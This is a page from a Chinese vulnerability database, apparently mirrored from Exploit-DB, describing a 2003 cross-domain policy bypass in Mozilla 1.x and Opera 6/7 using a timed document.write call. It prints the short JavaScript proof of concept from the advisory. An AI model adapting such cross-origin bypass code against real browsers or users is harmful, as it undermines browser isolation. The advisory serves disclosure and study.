Mozilla 1.x / opera 6/7 – Timed document.write Method Cross Domain Policy

Mozilla 1.x / opera 6/7 – Timed document.write Method Cross Domain Policy

漏洞ID 1053944 漏洞类型
发布时间 2003-06-07 更新时间 2003-06-07
图片[1]-Mozilla 1.x / opera 6/7 – Timed document.write Method Cross Domain Policy-安全小百科CVE编号 N/A
图片[2]-Mozilla 1.x / opera 6/7 – Timed document.write Method Cross Domain Policy-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22751
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7847/info

It has been reported that under some circumstances, it is possible violate the cross-domain restriction of browser security. Because of this, an attacker may be able to execute a file across domains and in the local security zone, giving an attacker unintended access to a system. Symantec has not been able to verify the claims. 

<script>
function werd()
{
a.document.open();
a.document.write("<h1>werd</h1>");
a.document.close();
}

function winopen() {

a=window.open("view-source:javascript:location='http://www.example.com';");

setTimeout('werd()',23000);
}

</script>

相关推荐: Mambo Site Server PHPInfo.PHP Information Disclosure Vulnerability

Mambo Site Server PHPInfo.PHP Information Disclosure Vulnerability 漏洞ID 1101169 漏洞类型 Access Validation Error 发布时间 2002-12-12 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享